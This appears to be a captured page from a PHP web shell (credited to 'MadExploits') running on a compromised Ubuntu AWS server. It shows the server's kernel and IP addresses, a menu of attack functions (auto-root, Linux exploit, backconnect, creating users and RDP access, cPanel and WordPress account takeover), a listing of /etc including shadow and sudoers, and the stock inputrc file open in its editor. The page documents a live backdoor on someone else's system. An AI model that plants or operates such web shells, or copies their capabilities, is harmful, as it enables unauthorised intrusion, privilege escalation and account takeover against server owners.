Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.135.218.96
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core18 /
2855 /
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
NetworkManager
[ DIR ]
drwxr-xr-x
X11
[ DIR ]
drwxr-xr-x
apparmor
[ DIR ]
drwxr-xr-x
apparmor.d
[ DIR ]
drwxr-xr-x
ca-certificates
[ DIR ]
drwxr-xr-x
cloud
[ DIR ]
drwxr-xr-x
dbus-1
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
depmod.d
[ DIR ]
drwxr-xr-x
dhcp
[ DIR ]
drwxr-xr-x
gss
[ DIR ]
drwxr-xr-x
ifplugd
[ DIR ]
drwxr-xr-x
init.d
[ DIR ]
drwxr-xr-x
iproute2
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
ldap
[ DIR ]
drwxr-xr-x
libnl-3
[ DIR ]
drwxr-xr-x
logcheck
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
modprobe.d
[ DIR ]
drwxr-xr-x
modules-load.d
[ DIR ]
drwxr-xr-x
netplan
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
rsyslog.d
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
sudoers.d
[ DIR ]
drwxr-xr-x
sysctl.d
[ DIR ]
drwxr-xr-x
system-image
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
udev
[ DIR ]
drwxr-xr-x
ufw
[ DIR ]
drwxr-xr-x
update-motd.d
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
wpa_supplicant
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
xdg
[ DIR ]
drwxr-xr-x
.pwd.lock
0
B
-rw-------
adduser.conf
2.96
KB
-rw-r--r--
bash.bashrc
2.26
KB
-rw-r--r--
bash_completion
45
B
-rw-r--r--
bindresvport.blacklist
367
B
-rw-r--r--
ca-certificates.conf
5.75
KB
-rw-r--r--
deluser.conf
604
B
-rw-r--r--
environment
106
B
-rw-r--r--
fstab
37
B
-rw-r--r--
group
707
B
-rw-r--r--
gshadow
588
B
-rw-r-----
host.conf
92
B
-rw-r--r--
hostname
1
B
-rw-r--r--
hosts
159
B
-rw-r--r--
hosts.allow
411
B
-rw-r--r--
hosts.deny
711
B
-rw-r--r--
inputrc
1.71
KB
-rw-r--r--
issue
27
B
-rw-r--r--
issue.net
16
B
-rw-r--r--
ld.so.cache
13.64
KB
-rw-r--r--
ld.so.conf
34
B
-rw-r--r--
legal
267
B
-rw-r--r--
libaudit.conf
191
B
-rw-r--r--
localtime
118
B
-rw-r--r--
login.defs
10.32
KB
-rw-r--r--
lsb-release
101
B
-rw-r--r--
machine-id
0
B
-rw-r--r--
mailcap
2.46
KB
-rw-r--r--
mailcap.order
449
B
-rw-r--r--
mime.types
23.73
KB
-rw-r--r--
modules
195
B
-rw-r--r--
motd
591
B
-rw-r--r--
nsswitch.conf
530
B
-rw-r--r--
os-release
176
B
-rw-r--r--
passwd
1.53
KB
-rw-r--r--
profile
581
B
-rw-r--r--
securetty
4.04
KB
-rw-r--r--
shadow
851
B
-rw-r-----
shells
73
B
-rw-r--r--
subgid
0
B
-rw-r--r--
subuid
0
B
-rw-r--r--
sudoers
755
B
-r--r-----
timezone
8
B
-rw-r--r--
ucf.conf
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : inputrc
# /etc/inputrc - global inputrc for libreadline # See readline(3readline) and `info rluserman' for more information. # Be 8 bit clean. set input-meta on set output-meta on # To allow the use of 8bit-characters like the german umlauts, uncomment # the line below. However this makes the meta key not work as a meta key, # which is annoying to those which don't need to type in 8-bit characters. # set convert-meta off # try to enable the application keypad when it is called. Some systems # need this to enable the arrow keys. # set enable-keypad on # see /usr/share/doc/bash/inputrc.arrows for other codes of arrow keys # do not bell on tab-completion # set bell-style none # set bell-style visible # some defaults / modifications for the emacs mode $if mode=emacs # allow the use of the Home/End keys "\e[1~": beginning-of-line "\e[4~": end-of-line # allow the use of the Delete/Insert keys "\e[3~": delete-char "\e[2~": quoted-insert # mappings for "page up" and "page down" to step to the beginning/end # of the history # "\e[5~": beginning-of-history # "\e[6~": end-of-history # alternate mappings for "page up" and "page down" to search the history # "\e[5~": history-search-backward # "\e[6~": history-search-forward # mappings for Ctrl-left-arrow and Ctrl-right-arrow for word moving "\e[1;5C": forward-word "\e[1;5D": backward-word "\e[5C": forward-word "\e[5D": backward-word "\e\e[C": forward-word "\e\e[D": backward-word $if term=rxvt "\e[7~": beginning-of-line "\e[8~": end-of-line "\eOc": forward-word "\eOd": backward-word $endif # for non RH/Debian xterm, can't hurt for RH/Debian xterm # "\eOH": beginning-of-line # "\eOF": end-of-line # for freebsd console # "\e[H": beginning-of-line # "\e[F": end-of-line $endif
Close